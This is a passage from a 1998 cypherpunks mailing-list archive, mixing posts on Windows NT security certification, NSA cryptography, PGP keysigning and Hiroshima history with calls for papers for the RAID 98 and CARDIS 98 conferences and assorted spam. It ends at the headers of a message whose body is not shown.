Apparently the gov't isn't too happy with the way MS is bluring the edges
of C2 certification of their products [Which they are buying].

	http://www.wired.com/news/news/technology/story/12121.html

-Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rescue9111@hotmail.com
Date: Wed, 3 Jun 1998 04:29:59 -0700 (PDT)
To: Friend@public.com
Subject: 10-03
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








                                      BENCHMARK PRINT SUPPLY
                                        1091 REDSTONE LANE
                                         ATLANTA GA 30338

                      FOR ORDERS/PRICING ONLY PLEASE CALL (770)399-0953
                  CUSTOMER SERVICE/SUPPORT ISSUES PLEASE CALL (770)399-5505
                  FOR COMPLAINTS OR E-MAIL REMOVAL PLEASE CALL (770)399-5614



                      OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGES, PRICES
                                      NOW AS LOW AS $39 & UP
                    WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
                         AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

                     HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
                          IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
                              EPSON SERIES 2/1100/1500/6000/7000/8000
                                         NEC SERIES 90/95
                 CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
                        HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
                                      CANON FAX ALL MODELS
            WE DO NOT CARRY : BROTHER - PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP

                    PRICES DO CHANGE PERIODICALLY. PLEASE CALL TO GET THE MOST
                      RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!
                           ORDERS/PRICING LINE ONLY CALL (770)399-0953

                      *****NEW,NEW,NEW $10 MAIL IN REBATE ON ALL CARTRIDGES*****
                   ****SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK****                        
               ****YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT****


                           WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
                          CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
                     ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE
                       
                      .

                               PLEASE NOTE: WE ARE CURRENTLY BUYING
                             HP-SERIES 5L - 5P - AND  4000 CARTRIDGES
                                   ALL LEXMARK OPTRA CARTRIDGES
                                    CANON PC COPIER CARTRIDGES
                      NOTE: THESE ARE THE ONLY CARTRIDGES CURRENTLY INCLUDED
                                     IN OUR BUY BACK PROGRAM
               TO ARRANGE CARTRIDGE PICKUP CALL  CUSTOMER SERVICE (770)399-5505










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew White" <awhite@indigo.ie>
Date: Tue, 2 Jun 1998 22:06:40 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: WinNT C2?
Message-ID: <008e01bd8ead$5cdc4db0$0100007f@localhost>
MIME-Version: 1.0
Content-Type: text/plain


Versions are important, too...

Quote from current Microsoft Web site...

"<The NT 3.51 ITSEC> evaluation along with the US TCSEC class C2 evaluation
completed in 1995 for Windows NT 3.5
demonstrates Microsoft's commitment to building a secure operating system
and continuing to provide customers
with assurance of its security characteristics based on these evaluations>"

NT 4.0 has never passed ANY security evaluation. NT 3.51 passed a UK one in
October 1996, NT 3.5 passed C2 in
1995. Both these earlier versions are effectively unusable due to diverse
and numerous bugs unrelated to security,
and both the evaulations were without a network card.


Later,
Andrew.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 2 Jun 1998 15:57:13 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's speech in parliament
Message-ID: <1.5.4.32.19980602225151.00b8d840@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


G'day,

The media are once again blatantly misrepresenting the issues that Pauline
Hanson raised in parliament yesterday.

We would invite you to see for yourself a verbatim transcript of what she
said and view direct links to the ATSIC and UN home pages which confirm her
concerns on the issues raised such as the planned "formation of independent
Aboriginal states" in Australia.
 
View: http://www.gwb.com.au/un.html

Be informed! Do not believe the lies the media tell.

Please print out her speech and distribute it freely.

GWB




Scott Balson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 3 Jun 1998 10:03:17 -0700 (PDT)
To: jensul@wired.com
Subject: My knowledge of NSA 'deficient' crypto algorithms
Message-ID: <3575813B.4DBE@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 6/3/98 10:55 AM

jensul

So as not to misspell J[G]en[n]ifer.

You might be interested to look at the University of Southern
California home page on the gfsr.

My co-author Lewis was one of my former ms and phd students.

NSA's crypto algorithms are okay - for hardware implementation -
but are classified, in my opinion, to possibly hide embarrassment.

Some of us at Sandia offered to help NSA fix its 'deficient' crypto
algorithms.  For money, of course.

It is EASY to make a BLUNDER in crypto.  For theoretical or
implementation reasons.  NSA knows this too.  And is pretty cautious
about what it does.

I partially read another crypto-related article at

http://www.news.com/News/Item/0%2C4%2C22705%2C00.html?st.ne.fd.gif.j

Best
bill

Subject: 
        Marc Dacier
  Date: 
        Wed, 03 Jun 1998 07:34:04 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        jy@jya.com
    CC: 
        dac@zurich.ibm.com, kaj@lanl.gov


Wednesday 6/3/98 7:25 AM

John Young

I looked at http://www.zurich.ibm.com/~dac/RAID98

I was in Marc Dacier's (IBM Zurich Research Laboratory, Switzerland)
office last April in Zurich.

Dacier was quizzing me about what the US was concerned about,
secuity-wise, inside weapons systems.  Spiking, of course.

And it was so nice to learn only yesterday that USC has a home page
something I thought-up.

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

I SURE UNDERSTOOD the algorithms behind the NSA KG schematics
Brian Snow showed me.

Let's continue to hope for prompt settlement of the unfortunate matter
BEFORE things get WORSE.  

And we can all get onto better and hopefully less destructive,
http://www.aci.net/kalliste/, endeavors.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Guerra <az096@freenet.toronto.on.ca>
Date: Wed, 3 Jun 1998 14:53:56 -0700 (PDT)
To: mpj@ebible.org>
Subject: Re: PGP Keysigning Announcement page
In-Reply-To: <199806021710.NAA28763@shell1.interlog.com>
Message-ID: <v0401170db19b0f5992e0@209-20-7-15.dialin.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I would like to know if you could include a link the following www address
which I have setup in the PGP FAQ that you maintain.

If you place a link to the page on your www page...please let me know so
that I can place a reciprocal link.
- ---

In an attempt to encourage PGP keysigning parties
I have created a PGP Keysigning Announcement page.

(http://www.geocities.com/CapitolHill/3378/pgpparty.html)


It is my hope that with time it will be a place where PGP users
can know  when & where the next keysigning session (in thier area)
will be held.

If you know of a keysigning party that is held anywhere please
let me know so that I can list it.


(any other comments or suggestions also welcome)

regards

robert



-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.3
Comment: Digital signatures verify author and unaltered content

iQEVAwUBNXVj2Is5aKqJYZvFAQF+Wwf9HPcukFKiYhFYN5h8dIFNApF8/+89kudu
NWKWLy5WEEDvcK12Unf0i9Ihwch8a5hANb3oP5R57hNttUUJa+7Lb4O5pg/D52XM
7aHu+JHW/4ZCVhGUAqBvuV+rJkRZJgvCe1vGC3JsB6V3vBm+pNEmyz5C9w7R00nW
7dTG4wXlzxda8fIPbcdOC8iZYR3j2YeEiQvuV5gktsx0VIk9ZLn1Pz4TqNQCTUmW
qyVTZz5LV6EKsjr2/SM1OLIJkjNZyCYMqQZ3Bt/ZPMXKuaYmhcTyYOXggEuU2r9W
4mITGDuHItyUwV45lJUBCzZYYowSNBABOXGJ4fwkpKRKWo1Uuw0vZg==
=EmIr
-----END PGP SIGNATURE-----

Robert Guerra - Email-> mailto:az096@freenet.toronto.on.ca  ICQ #10266626
Home Page-> http://www.geocities.com/CapitolHill/3378
PGPKeys available on WWW Page & via finger://rguerra@flare.dynip.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 3 Jun 1998 08:47:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: DNA sequencing info needed
In-Reply-To: <D104150098E6D111B7830000F8D90AE801789C@exna02.securitydynamics.com>
Message-ID: <199806031547.LAA04781@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


It's now a cliche of bio-terrorism bellringers that
"this stuff scares me silly," with scientists, pols
and first responders now comically repeating the 
code.

A technological artist on Long Island has set up in 
his studio a collection of the most deadly germs known 
on earth, in a small glass display, with labels and 
descriptions of what they are and can do: dosages, kill
ratios, distribution methods, sources of specimens
and food supplies, URLs for bio-terrorists.

He invites art connoisseurs to visit. They walk around
the room looking for the show, see little except typical
suburban living room furniture, then spy the glass
tank, approach, read, freeze, then begin to tremble.

Some scream, some faint, some vomit in horror,
claw clothing, stampede for the exit.

The artist tries to reassure them it's only a carefully 
constructed simulation. None believe him. They shiver 
outside in the yard and whimper accusations of terrorism, 
which, he confesses, is the truth of bio-terrorism, to 
scare sane people silly.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dac@zurich.ibm.com (Marc Dacier)
Date: Wed, 3 Jun 1998 03:28:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Last Call For Participation - RAID 98
Message-ID: <9806031027.AA140462@collon.zurich.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



		Last Call For Participation - RAID 98

      (also available at http://www.zurich.ibm.com/~dac/RAID98)

   First International Workshop on the Recent Advances in Intrusion
			      Detection

	   September 14-15, 1998 Louvain-la-Neuve, Belgium

We solicit your participation in the first International Workshop on the 
Recent Advances in Intrusion Detection (RAID 98). 

This workshop, the first in an anticipated annual series, will bring 
together leading figures from academia, government, and industry to talk 
about the current state of intrusion detection technologies and paradigms 
from the research and commercial perspectives. 

Research into and development of automated intrusion detection systems 
(IDS) has been under way for nearly 10 years. By now a number of systems 
have been deployed in the commercial or government arenas, but all are 
limited in what they do. At the same time, the numerous research and 
prototype systems developed have been more engineering than scientific 
efforts, with scant quantitative performance figures. As we survey the 
field of automated intrusion detection, we are faced with many questions: 

1.	What research questions have yet to be answered (or even
        asked) about IDS? 
2.	What are the open challenges, limitations, and fundamental
        concerns about present intrusion detection methodologies? 
3.	What metrics can we use to measure IDS performance and thus 
        compare different systems and methodologies? These
        measurements should highlight the successes and expose the
        limitations of current IDS approaches. 
4.	What factors are inhibiting transfer of research ideas into 
        functional deployed systems? How can those be addressed? 
5.	What is the role of a deployed IDS? How should or can it fit in 
        with other security systems? 
6.	What are the typical IDS operating environments? What can be 
        done to configure IDS to unique operating environments?
7.	What are the challenges for IDS in very large environments, such 
        as the Internet? 
8.	Is it time to contemplate IDS standards? What are the advantages
        and disadvantages of standardizing components of IDS?
        What forums (e.g., IETF, ISO) would be appropriate for
        pursuing such standards? 
9.	What are the problems of turning the results of intrusion
        detection tools into legally reliable evidence? What are the
        problems of admissibility and of courtroom presentation? 

We invite proposals and panels that explore these questions or any other 
aspect of automated intrusion detection. We especially solicit proposals 
and panels that address: 

1.	New results related to intrusion detection methodologies and 
        technologies. 
2.	Innovative ways of thinking about intrusion detection; for 
        example, the applicability of R&D in the fields of survivable
        and/or dependable systems, data mining, etc. 
3.	User experiences and lessons learned from fielded intrusion 
        detection systems. 
4.	IDS for emerging computer environments (e.g., Java, CORBA, and 
        NT). 
5.      Commercial intrusion detection systems.

We have scheduled RAID 98 immediately before ESORICS 98, at the same time 
as CARDIS 98, and at the same location as both of these conferences. This 
provides a unique opportunity for the members of these distinct, yet 
related, communities to participate in all these events and meet and share 
ideas during joined organized external events. 

GENERAL CO-CHAIRS
*****************

Marc Dacier (IBM Zurich Research Laboratory, Switzerland)
Kathleen Jackson (Los Alamos National Laboratory, USA)

PROGRAM COMMITTEE
*****************

Matt Bishop (University of California at Davis, USA)
Dick Brackney (National Security Agency, USA)
Yves Deswarte (LAAS-CNRS & INRIA, France)
Baudouin Le Charlier (Universite de Namur, Belgium)
Stuart Staniford-Chen (University of California at Davis, USA)
Rowena Chester (University of Tennessee, USA)
Deborah Frincke (University of Idaho, USA)
Tim Grance (National Institute of Standards and Technology, USA)
Sokratis Katsikas (University of the Aegean, Greece)
Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium)
Mark Schneider (National Security Agency, USA)
Marv Schaefer (Arca Systems, USA)
Peter Sommer (London School of Economics & Political Science, England)
Steve Smaha (Free Agent, USA)
Gene Spafford (Purdue University, USA)
Chris Wee (University of California at Davis, USA)
Kevin Ziese (Cisco, USA)

SUBMISSIONS
***********

The program committee invites proposals for both technical and general 
interest talks and panels.

Each talk or panel submission must contain:

1)  A separate title page with:
      The type of submission (talk or panel);
      The title or topic; and
      The name(s) of the speaker or panel chair and probable
      panelists, with their organizational affiliation(s), telephone
      and FAX numbers, postal address, and Internet electronic mail
      address.
2)  A brief biography of each participant.
3)  The time desired for the talk or panel.

Talk proposals must also include an abstract that is a maximum of 600 
words in length. Papers are not required, but if included as an addendum, 
will be used as supplementary information for the evaluation of the talk 
proposal. The program committee will allocate each accepted presenter 
either a 15 or 30-minute slot for the talk, based on the complexity and 
interest of the proposed topic and the wishes of the speaker. The 
presenter will be informed the slot length when notified of acceptance.

Panel proposals must also include a description that is a maximum of 300 
words, the format of the presentation, and short rationale for the panel. 
The program committee will allocate accepted panel sessions one to 
two-hour time slots, based on the complexity and interest of the proposed 
topic, the number of panelists, and the wishes of the panel chair. The 
panel chair will be informed the slot length when notified of acceptance.

All proposals must be in English. Plan to give all panels and talks in 
English. 

We must receive all proposals before June 15, 1998. We strongly prefer 
they be submitted by e-mail to raid98@zurich.ibm.com. Various formats 
(ASCII, postscript, Word, WordPro, Framemaker, and LaTex) are acceptable. 
If necessary, hardcopy proposals may be sent to: 

Marc Dacier
Global Security Analysis Lab
IBM Zurich Research Laboratory
Saeumerstrasse 4
CH-8803 Rueschlikon
Switzerland

Each submission will be acknowledged by e-mail.  If acknowledgment is not 
received within seven days, please contact the one of the General 
Co-Chairs.

A preliminary program will be available at the RAID web site
(http://www.zurich.ibm.com/~dac/RAID98) by August 1, 1998.

CORPORATE SPONSORS
******************

We solicit interested organizations to contribute to student travel 
expenses for RAID 98. Corporate sponsorship will cost 2500 US$, and will 
entitle the organization to four general attendance workshop passes. 
Please contact a General Co-Chair for more information.
 
REGISTRATION
************

Registration will open on 1 August 1998, at which point detailed 
registration information (including a list of recommended hotels) will be 
provided at the RAID 98 web site (http://www.zurich.ibm.com/~dac/RAID98). 
Travel instructions to Louvain-la-Neuve are available at 
http://www.dice.ucl.ac.be/crypto/acces-lln.html (courtesy of the UCL 
Crypto Group). Registration will close on 21 August 1998. Late 
registration will continue until 4 September 1998, but only on a 
space-available basis, and will include a penalty of 50 US$ (in addition 
to the fees specified below). 

Fees will be levied on a sliding scale, as follows:

Student: $200
Speaker or Panel Member: 250 US$
General attendance: 350 US$

This fee will include workshop sessions, banquet, hosted reception, 
luncheons, light breakfast service, and coffee and refreshment breaks. 
There will be no special rate for one-day or other limited attendance. 
Payment in full will be required at registration. 

We are negotiating a registration discount for those attending both the 
ESORICS conference and the RAID or CARDIS workshops, and for 
interchangeable workshop registration. Further information will be 
available when detailed registration information is posted.

PROCEEDINGS
***********

On-line workshop proceedings will be posted on the RAID web site
(http://www.zurich.ibm.com/~dac/RAID98) immediately following the workshop. 
It will include:

1)	The final program;
2)	A list of corporate sponsors;
3)	A list of attendees (subject to each attendee's approval);
4)	The submitted abstract and slides used by each speaker;
5)	The submitted description and rationale for each panel;
6)	The slides used by each panelist; and,
7)	Written position statements from each panelist.

In addition, the most outstanding workshop participants will be invited to 
submit an analogous formal paper to a special RAID edition of the refereed 
journal "Computer Networks and ISDN Systems."

IMPORTANT DATES
***************

Deadline for submission: 15 June 1998 
Registration opens: 1 August 1998
Notification of proposal acceptance or rejection: 1 August 1998
Preliminary program posted to web: 1 August 1998
Registration closes: 21 August 1998
Late registration closes: 4 September 1998
Workshop: 14-15 September 1998

MORE INFORMATION
****************

For further information contact one of the General Co-chairs: 

Marc Dacier 
IBM Zurich Research Laboratory 
Switzerland 
E-mail: dac@zurich.ibm.com 
Tel.: +41-1-724-85-62 
Fax.: +41-1-724-89-53 
                                         
Kathleen Jackson
Los Alamos National Laboratory
USA
E-mail: kaj@lanl.gov
Tel.: +41-1-724-86-29
Fax.: +41-1-724-89-53

The RAID 98 web site: http://www.zurich.ibm.com/~dac/RAID98,

The ESORICS 98 web site: http://www.dice.ucl.ac.be/esorics98. 

The CARDIS 98 web site: http://www.dice.ucl.ac.be/cardis98/ 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Jacques Quisquater <Quisquater@dice.ucl.ac.be>
Date: Wed, 3 Jun 1998 06:15:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CARDIS 98: smart card research
Message-ID: <199806031314.PAA10742@ns1.dice.ucl.ac.be>
MIME-Version: 1.0
Content-Type: text/plain


CARDIS Conference Announcement

Final Call for Papers and Panels

-------------------------------------------------------------
THIRD SMART CARD RESEARCH AND ADVANCED APPLICATION CONFERENCE

SEPTEMBER 14-16, 1998

UCL, LOUVAIN-LA-NEUVE, BELGIUM
------------------------------------------------------------

Aims and Goals

Smart cards, or IC cards, offer a huge potential for information processing
purposes. The portability and processing power of IC cards allow for highly
secure conditional access and reliable distributed information systems.
There are IC cards available that can perform highly sophisticated cryptographic
computations. The applicability of IC cards is currently limited mainly
by our imagination; the information processing power that can be gained
by using IC cards remains as yet mostly untapped and is not well understood.
Here lies a vast uncovered research area which we are only beginning to
assess, and which will have a great impact on the eventual success of the
technology. The research challenges range from electrical engineering on
the hardware side to tailor-made cryptographic applications on the software
side, and their synergies.

Many currently existing events are mainly devoted to commercial and
application aspects of IC cards. In contrast, the CARDIS conferences aim
to bring together researchers who are active in all aspects of the design
of IC cards and related devices and environments, such as to stimulate
synergy between different research communities and to offer a platform
for presenting the latest research advances.

CARDIS 1994, sponsored by the International Federation for Information
Processing (IFIP), held in November 1994 in Lille, France, successfully
brought together representatives from leading IC research centers from
all over the world. CARDIS 1996 was the second occasion for the IC
card community in this permanent activity. CARDIS 1996 was organized jointly
by the Centre for Mathematics and Computer Science at Amsterdam (CWI) and
the Department of Logic and Computer Science of the University of Amsterdam
(UvA).

Organization

General Chair
              Catherine Rouyer (UCL, Louvain-la-Neuve, Belgium)

Program Chairs
              Jean-Jacques Quisquater (UCL, Louvain-la-Neuve, Belgium)
              Bruce Schneier (Counterpane, USA)

Program Committee (in construction)
              William Caelli  (QUT, Brisbane, Australia) 
              Vincent Cordonnier  (R2DP, Lille, France) 
              David Chan  (HP Labs, Bristol, UK) 
              Jean-Franois Dhem (Belgacom, Belgium) 
              J. Eloff  (RAU, South Africa) 
              Marc Girault  (CNET, France) 
              Louis Guillou  (CNET, France) 
              Pieter Hartel  (Southampton, UK and Amsterdam, The Netherlands) 
              Peter Honeyman  (Michigan U., USA) 
              Pierre Paradinas  (Gemplus, France) 
              Qiang  (Acad. Sciences, Beijing, China) 
              Michel Ugon (Bull CP-8, France) 
              Doug Tygar  (Carnegie-Mellon Univ., USA) 
              Anthony Watson  (ECU, Perth, Australia) 
              Wijang Zhang  (Shangai, China) 

Steering Committee Chair
              Vincent Cordonnier (Rd2p, Lille, France)

Local Organization
              Catherine Rouyer (UCL)
              Benoit Macq (UCL)

SUBMISSIONS
Submissions will be judged on relevance, originality, significance,
correctness, and clarity. Each paper should explain its contribution
in both general and technical terms, identifying what has been
accomplished, saying why it is significant, and comparing it with
previous work. Authors should make every effort to make the technical
content of their papers understandable to a broad audience. Papers
should be written in English. Working papers, research in progress 
are welcome. 

Authors should submit: an extended abstract (more or less 5 pages) either 
by email to jjq@dice.ucl.ac.be (we prefer the electronic submission) 
using one of the following formats: postscript, rtf, latex or word 6. 

or send 12 copies of the paper to 

     Jean-Jacques Quisquater 
     UCL/DICE 
     Place du Levant, 3 
     B-1348 Louvain-la-Neuve 
     Belgium

The paper should be formatted using the LNCS format from Springer-Verlag, if possible. 

In any case, each paper should be accompanied by information 
submitted via email to jjq@dice.ucl.ac.be that consists of: 

* a single postal address and electronic mail address for communication 
* complete title, author and affiliation information 
* the abstract of the paper 
* a small selection of the keywords that appear on this call for 
  papers, which best describes the contribution of the paper 

Preproceedings will be available at the conference. It is intended to 
publish the proceedings in the Springer-Verlag LNCS series. Authors of 
accepted papers may be expected to sign a copyright release form. 

IMPORTANT DATES

Submission deadline        June 15, 1998
Acceptance notification    July 15, 1998
Camera ready paper due     Augustus 15, 1998
Conference                 September 14-16 1998

THEMES

Technology/hardware
  IC architecture and techniques
  Memories and processor design
  Read/Write unit engineering
  Specific co-processors for cryptography
  Biometry
  Communication technologies
  Interfaces with the user, the service
suppliers
  Reliability and fault tolerance
  Special devices
  Standards
Software
  The operating system, Java, ...
  Models of data management
  Communication protocols
IC Card design
  Tools for internal or external software production
  Validation and verification
  Methodology for application design
Electronic payment systems
  Road pricing
  Internet payment systems
  Untraceability
Algorithms
  Formal specification and validation
  Identification
  Authentication
  Cryptographic protocols for IC cards
  Complexity
Security
  Models and schemes of security
  Security interfaces
  Hardware and software implementation
  Security of information systems including cards
  Formal verification of transaction sets
  Protocol verification
IC Cards, individuals and the society
  IC cards and privacy
  Owner access of data
  IC cards: political and economical aspects
  Is the IC card going to change legislation?
  Patents, copyrights
Future of IC cards
  Innovative technologies
  Moving towards the pocket intelligence
  Convergence with portable PCs, lap tops etc ...
  PCMCIA
Innovative applications
  Design methodology of applications
  IC cards and the information system
  Examples of new applications
  Requirements for innovative cards
Standards
  Emerging standards
  Compliance and approval




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SMODeLUX@aol.com
Date: Wed, 3 Jun 1998 14:12:31 -0700 (PDT)
Subject: [E-WRESTLING]  New fed that's superior to all others ...
Message-ID: <4abf174c.3575b995@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


   b r u t e   f o r c e   w r e s t l i n g         .
............................................................

BFW HANDBOOK
Last Revised: 4.22.98

-=-=-=-=-=-=-=-=-=-=-=-=-=-
     BFW INTRODUCTION:
-=-=-=-=-=-=-=-=-=-=-=-=-=-          
 
	Screw organization with those "preppy handbooks," Screw the weenies
that take e-Wrestling seriously, and screw the critics.  Do you think you're a
tough guy?  Are you _brutal_?  Are you sure?  You can't be sure unless you
strut your stuff in the paragon of e-Wrestling fun, the BFW (Brute Force
Wrestling).  

	We don't really care what all the other fed heads think, and we're
going to approach this federation a little differently.  No longer will you
see the 20k BORING as hell matches, we're going to keep them short, with the
occasional overdrive.  Now let me ask you, do you REALLY see 55 minute
matches 
on regular broadcasts such as RAW or Nitro?  I don't.  Maybe on a PPV, but
we'll
stretch our matches on PPVs a little.  Anywhoo, what will this short match
process result in?  Fewer late cards, I know you all love that.  

	What else will make this fed fun?  We'll give magazines instead of 
updates, updates usually just have the same stuff anyway.  In fact, I
always skip 
to the rankings when I read an update.  We'll show you a good product with our
magazine.  In-depth articles, and must-read writing.  Do you think you're
up for 
it?  If so, fill out this application form, but remember, we can only fit
20 singles 
wrestler's and 10 tags on our roster.

But beware... those who enter shall never leave... for they will be
engulfed in
fun and excitement, and they'll never even shed the thought of leaving!

Thanks,
    Sean and Chris


-=-=-=-=-=-=-=-=-=-=-=-=-=-
      BFW ROLEPLAYING:
-=-=-=-=-=-=-=-=-=-=-=-=-=- 

	BFW is a booked wrestling league, meaning that you roleplay to win matches. 
We do not use TNM, WLS, or any other simulator. All matches are hand
written for the 
most exciting action anywhere.

	The only rule for roleplaying is that you must do it often. If you don't
roleplay for a month, you're history. We may keep you around as a scrub and
job the
hell out of you, ruining your reputation. We may also just kick you out of
the fed
completely.


-=-=-=-=-=-=-=-=-=-=-=-=-=-
       BFW SPECIFICS:
-=-=-=-=-=-=-=-=-=-=-=-=-=- 

Headquarters:    BFW Arena in Salt Lake City, Utah

       Cards:    House shows (Quick Result Report sent out weekly)
                 Tuesday's televised show, BFW Tuesday Tap-Out
                 Friday's televised show, BFW Friday Fright Night
                 Monthly Pay-Per-View events

      Titles:    BFW World Heavy-Weight Champion
                 BFW World Tag Team Champions
                 BFW Network Champion
 
              
-=-=-=-=-=-=-=-=-=-=-=-=-=-
      BFW APPLICATION
-=-=-=-=-=-=-=-=-=-=-=-=-=- 

 ========================
 YOUR INFORMATION:
 Hey, we can get to know ya.
 ========================

 YOUR NAME - 
 YOUR AGE - (optional)

 ========================
 WRESTLER'S INFORMATION:
 Duh!
 ========================

 WRESTLER'S NAME -

 ALLIGNMENT - (heel/face/neutral)
 
 WRESTLER'S HEIGHT - (nothing above 7", please)
 WRESTLER'S WEIGHT - (nothing extraordinary here, either)
 
 WRESTLER'S LOOKS - (breif description here.  Add in attire)
 
 WRESTLER'S HISTORY - (Who, what, where, why, when?)

 TWENTY MOVES YOUR WRESTLER APPLIES -
 
 YOUR WRESTLER'S FINISHING MANEUVER - 
 
 DESCRIBE IT - (it doesn't have to be TOO complex)
 
 YOUR WRESTLER'S MANAGER - (optional)
 
 YOUR WRESTLER'S THEME MUSIC - (nothing other than music done by real
 musicians, no real wrestler music)

 ========================
 TAG TEAM INFORMATION
 (Optional)
 ========================

 NAME OF TAG TEAM - 
 WHO DOES HE TAG WITH? -
 TAG TEAM FINISHER - 
 DESCRIBE IT - 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy26@prodigy.com
Date: Wed, 3 Jun 1998 17:41:19 -0700 (PDT)
To: andy@megahardcore.com
Subject: Awesome!
Message-ID: <199805190417.AAA07146@rly-zb04.mx.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
This is intended for adults.  If you are under 18, or viewing these materials is illegal where
you live, please delete this now.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

AWESOME!

http://www.pornsitez.com/hardcore/xxxmovies/

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sprokkit Amhal" <sprokkit@hotmail.com>
Date: Thu, 4 Jun 1998 12:36:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anonymous mailboxes
Message-ID: <19980604193606.27765.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


   Some time ago I heard about Lucky Green's then-immature scheme for 
anonymous email boxes, whereby a user can receive email and even a 
traffic analysis attacker is unable to glean information about who 
received what when.  I forget exactly what ve called vis method...




   Is there a paper available anyplace?

   Has the scheme been validated mathematically?

   Has it been implemented?




    ::sprokkit::

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doris Woods <dorisaw@idt.net>
Date: Thu, 4 Jun 1998 12:14:22 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Kirtland Air Force Base
In-Reply-To: <199806012257.RAA019.42@geiger.com>
Message-ID: <3576F1BE.BA662E1B@idt.net>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <35732427.ECA43EB9@idt.net>, on 06/01/98
>    at 05:59 PM, Doris Woods <dorisaw@idt.net> said:
> 
> >Hi all,
> 
> >bill payne wrote:
> >>
> >> Saturday 5/30/98 5:15 PM
> 
> >> Masanori, the book Decision to Use the Atomic Bomb by Gar Alperovitz
> >> presents fairly good evidence some in US government nuked Hiroshima and
> >> Nagasaki merely to impress the Russians.
> >>
> 
> >Carroll Quigley said in Tragedy and Hope...  they were worried the war
> >would be over with before they got their chance to use it!
> 
> Was this before or after they estimated that it would cost upwards of 1
> Million lives to take the Japan mainland by conventional forces?
> 
> - --



Well... a Leo Szilard web site ( How do you say it? Say sil'-ahrd.)
has an article where he is interviewed titled

_Leo Szilard, Interview: President Truman Did Not Understand_

http://www.peak.org/~danneng/decision/usnews.html

"After all, Japan was suing for peace."

"Today I would say that the confusion arose from considering the fake 
alternatives of either having to invade Japan or of having to use the
bomb against her cities."


I admit I only followed a link from Home Page of J. Orlin Grabbe 
titled...

_Target Committee Meeting, Los Alamos, May 10-11, 1945_

to get to that particular story. 


Of more particular interest to myself is the shipment of 65% uranium
oxide,
sent from the Belgian Congo, in 1939-40. 1250 tons were sent to 
Staten Island, NY, by Edward Sengier of Union Miniere, to prevent the
Axis powers from obtaining it. p 852.

It is a _good_ book. I enjoyed it.


Doris Woods




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 4 Jun 1998 19:10:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Spamford's new business venture
Message-ID: <3.0.5.32.19980604155141.008fc6f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Seems Spamford has found yet another way to Make M0ney 0n the Net -
as an expert witness for people suing spammers.
The paper said he'll be working for the law firm that nailed
him with a $2M case earlier this year.

Sigh.....
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 4 Jun 1998 14:12:59 -0700 (PDT)
To: cypherpunks@toad.com
